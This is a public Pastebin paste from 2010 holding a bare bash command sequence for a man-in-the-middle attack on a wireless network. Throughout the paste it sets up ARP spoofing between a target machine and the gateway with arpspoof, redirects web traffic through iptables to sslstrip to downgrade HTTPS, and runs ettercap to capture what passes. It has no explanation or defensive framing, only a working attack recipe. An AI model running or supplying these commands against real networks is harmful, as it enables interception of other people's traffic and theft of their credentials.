Share Pastebin
Guest
Public paste!

g0tmi1k

By: a guest | Apr 18th, 2010 | Syntax: Bash | Size: 0.32 KB | Hits: 1,522 | Expires: Never
Copy text to clipboard
  1. kate /etc/etter.conf
  2. >*uncomment redir_command_off in the iptables, linux section*
  3. echo 1 > /proc/sys/net/ipv4/ip_forward
  4. arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1
  5.  
  6. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  7. ettercap -T -q -i wlan0
  8.  
  9. sslstrip -a -k -f
  10. ettercap -T -q -i wlan0